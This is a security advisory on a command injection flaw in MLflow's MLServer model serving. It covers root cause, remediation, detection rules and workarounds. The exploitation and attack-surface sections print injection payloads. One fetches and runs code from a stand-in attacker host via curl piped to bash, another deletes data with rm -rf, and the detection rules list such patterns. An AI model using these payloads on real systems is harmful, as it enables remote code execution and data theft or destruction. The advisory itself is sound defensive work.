Executive Summary
A critical command injection vulnerability (CVE-2026-0596) has been identified in mlflow/mlflow, the widely deployed open-source machine learning lifecycle management platform. The flaw carries a CVSS score of 9.6 and is triggered when serving ML models using the enable_mlserver=True configuration flag.
The root cause is straightforward: the model_uri parameter is interpolated directly into a bash -c shell command without any sanitisation. An attacker who can influence the value of model_uri — for example, through a model registry, API call, or configuration input — can inject arbitrary shell metacharacters such as $() or backticks to achieve remote code execution on the host serving the model.
Any organisation running MLflow model serving with MLServer integration should treat this as an urgent patch priority, particularly in shared infrastructure, multi-tenant model serving environments, or pipelines that accept externally supplied model URIs.
Vulnerability Overview
| Attribute | Value |
|---|---|
| CVE ID | CVE-2026-0596 |
| CVSS Score | 9.6 (Critical) |
| CWE | CWE-78 — Improper Neutralisation of Special Elements used in an OS Command |
| Type | Command Injection / Remote Code Execution |
| Attack Vector | Network |
| Privileges Required | Low |
| User Interaction | None |
| Scope | Changed |
| Confidentiality Impact | High |
| Integrity Impact | High |
| Availability Impact | High |
| Trigger Condition | enable_mlserver=True at serve time |
Affected Versions
| Component | Affected Condition | Fixed Version |
|---|---|---|
| mlflow/mlflow | All versions — when serve() is called with enable_mlserver=True | Pending / apply workaround |
Technical Analysis
Root Cause
When MLflow is used to serve a model with the MLServer backend (enable_mlserver=True), the serving function constructs a shell command of the form:
```shell
bash -c "mlflow models serve -m <model_uri> --enable-mlserver ..."
```
The model_uri value is embedded directly into this command string without any escaping, quoting, or allowlist validation. This is a textbook CWE-78 (OS Command Injection) pattern.
Exploitation
An attacker who controls or influences the model_uri value can inject shell metacharacters:
```python
# Backtick injection
model_uri = "models:/mymodel/1`curl attacker.com/payload | bash`"

# Command substitution injection
model_uri = "models:/mymodel/1$(whoami > /tmp/pwned)"

# Semicolon-based chaining
model_uri = "models:/mymodel/1; rm -rf /critical/data"
```
Each of these patterns causes the injected command to execute in the context of the MLflow serving process — which in many deployments runs with service account or even root privileges.
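To make the mechanics concrete, the sketch below (plain Python, no MLflow required) shows that naive string interpolation passes the $() payload through to the shell verbatim, while shlex.quote from the standard library — one common neutralisation — wraps the value in single quotes so bash would treat it as literal text:

```python
import shlex

# One of the payloads above; the attacker controls only the model_uri value.
malicious_uri = "models:/mymodel/1$(whoami > /tmp/pwned)"

# Vulnerable pattern: the payload reaches bash -c verbatim, so the $()
# command substitution would run before mlflow ever parses the URI.
unsafe_cmd = f"mlflow models serve -m {malicious_uri} --enable-mlserver"

# shlex.quote() single-quotes the value, turning the metacharacters
# into literal text the shell will not interpret.
safe_cmd = f"mlflow models serve -m {shlex.quote(malicious_uri)} --enable-mlserver"

print(unsafe_cmd)
print(safe_cmd)
```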
Attack Surface
The attack surface is broader than it may initially appear:
- Model Registry API: If an attacker can register a model with a malicious URI, serving any version of it will trigger execution
- Automated pipelines: MLflow pipelines that auto-serve the latest registered model version are directly vulnerable
- Multi-tenant environments: Platforms where multiple teams can register models are especially at risk
- CI/CD integration: Pipelines that call mlflow models serve with dynamic URIs derived from external input
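The pipeline risk is worth spelling out, because the operator never handles the raw payload. The sketch below stubs out the registry lookup (the function name is illustrative, not MLflow's API) to show how an attacker-controlled model name flows into the command string on its own:

```python
def latest_model_uri(name: str, version: int) -> str:
    # Stand-in for a registry lookup; in a real pipeline the name and
    # version would come back from the MLflow Model Registry API.
    return f"models:/{name}/{version}"

# A malicious model *name* registered by a low-privileged tenant...
uri = latest_model_uri("mymodel`curl attacker.com/payload|bash`", 1)

# ...survives intact in the command the vulnerable code hands to bash -c.
command = f"mlflow models serve -m {uri} --enable-mlserver"
```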
Impact Assessment
| Impact Area | Description |
|---|---|
| Remote Code Execution | Arbitrary commands execute as the MLflow serving process user |
| Data Exfiltration | Access to training data, model artefacts, secrets, and environment variables |
| Lateral Movement | Shell access can be used to pivot to databases, cloud metadata endpoints, and internal services |
| Persistence | Attacker can install backdoors, cron jobs, or modified model files |
| Supply Chain Risk | Compromised model serving infrastructure can poison downstream predictions or data pipelines |
| Secrets Theft | Cloud provider credentials, MLflow tracking server tokens, and database URIs commonly present as environment variables |
Immediate Remediation
Step 1: Disable MLServer Integration Until Patched
```shell
# Do NOT use enable_mlserver=True until a patch is confirmed
mlflow models serve -m "models:/MyModel/1"

# Remove --enable-mlserver flag entirely
```
Step 2: Validate and Sanitise model_uri Inputs
If you must accept dynamic model_uri values, implement strict allowlist validation:
```python
import re

# Allowlist: registry URIs, run URIs, and plain S3 paths only.
SAFE_MODEL_URI_PATTERN = re.compile(
    r'^(models:/[a-zA-Z0-9_\-]+/[0-9]+'
    r'|runs:/[a-f0-9]{32}/[a-zA-Z0-9_/\-]+'
    r'|s3://[a-zA-Z0-9._\-/]+)$'
)

def validate_model_uri(uri: str) -> str:
    # Accepts e.g. "models:/MyModel/1"; rejects anything containing
    # shell metacharacters such as "$(", backticks, or ";".
    if not SAFE_MODEL_URI_PATTERN.match(uri):
        raise ValueError(f"Unsafe model_uri rejected: {uri}")
    return uri
```
Step 3: Use subprocess with Argument Lists Instead of Shell
If you are customising MLflow or contributing a fix, the correct pattern is:
```python
import subprocess

# INSECURE — DO NOT USE: shell=True lets metacharacters in model_uri execute
subprocess.run(f"bash -c 'mlflow models serve -m {model_uri}'", shell=True)

# SECURE — argument list bypasses shell interpretation
subprocess.run(
    ["mlflow", "models", "serve", "-m", model_uri, "--enable-mlserver"],
    shell=False
)
```
Step 4: Run MLflow Serving with Minimal Privileges
```shell
# Create a dedicated service account
useradd -r -s /sbin/nologin mlflow-serve

# Run serving as that account
sudo -u mlflow-serve mlflow models serve -m "models:/MyModel/1"

# Or in Docker: drop all capabilities
docker run --cap-drop ALL --security-opt no-new-privileges mlflow-serving-image
```
Detection
Check for Active Exploitation Indicators
```shell
# Look for unexpected processes spawned by the mlflow serving process
ps auxf | grep mlflow

# Check for suspicious command execution in audit logs
ausearch -c bash --start today

# Review MLflow server access logs for unusual model_uri values
grep -E '\$\(|`|;.*bash|&&.*curl' /var/log/mlflow/serve.log

# Confirm what is listening on the serving port, then check for
# unexpected outbound connections from the serving process
ss -tlnp | grep <mlflow-port>
netstat -anlp | grep ESTABLISHED | grep <mlflow-pid>
```
SIEM Detection Rule (Pseudocode)
```
rule: mlflow_command_injection_attempt
conditions:
  - process.name == "mlflow"
  - process.args contains any of ["$(", "`", "; bash", "&& curl", "| sh"]
  - event.type == "process_start"
severity: critical
response: alert + isolate
```
Workarounds
Until an official patch is released:
- Disable MLServer integration — do not pass enable_mlserver=True to any serving call
- Restrict model_uri sources — only serve models whose URIs are constructed internally, never from user input
- Network-segment the serving host — block egress from the MLflow serving process to limit the blast radius of exploitation
- Enable audit logging — capture all shell executions on the serving host
- Run in a container with restricted capabilities — limit what an injected command can do
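While a patch is pending, the SIEM pseudocode from the Detection section can also be prototyped as a small event filter. This is a minimal sketch — the event dictionary shape is an assumption for illustration, not any particular SIEM's schema:

```python
SUSPICIOUS_TOKENS = ("$(", "`", "; bash", "&& curl", "| sh")

def is_injection_attempt(event: dict) -> bool:
    """Flag process-start events where mlflow is launched with shell metacharacters."""
    if event.get("type") != "process_start" or event.get("name") != "mlflow":
        return False
    args = " ".join(event.get("args", []))
    return any(token in args for token in SUSPICIOUS_TOKENS)

# Hypothetical events, matching the rule's conditions above:
benign = {"type": "process_start", "name": "mlflow",
          "args": ["models", "serve", "-m", "models:/MyModel/1"]}
hostile = {"type": "process_start", "name": "mlflow",
           "args": ["models", "serve", "-m", "models:/m/1$(whoami)"]}
```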